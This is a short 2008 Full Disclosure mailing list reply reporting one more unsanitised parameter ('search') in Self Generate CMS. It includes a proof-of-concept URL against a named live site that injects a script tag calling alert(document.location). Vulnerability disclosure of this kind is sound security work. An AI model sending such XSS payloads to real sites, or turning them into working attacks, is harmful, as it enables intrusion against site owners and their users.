Full Disclosure mailing list archives
Re: Multiple XSS Vulnerabilities in Self Generate CMS (K?rast)
From: devildeath1988 () aol de
Date: Sun, 24 Aug 2008 19:46:12 -0400
Hi. I Have found one more vulnerable value which is not cleaned before it would be displayed. When you search, there would be a POST value 'search=injection'. It's like the page value. See here: http://www.ubuonline.co.uk/index.php?search=here%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go.x=0&go.y=%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E&go=Search devildeath
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Re: Multiple XSS Vulnerabilities in Self Generate CMS (K?rast) devildeath1988 (Aug 24)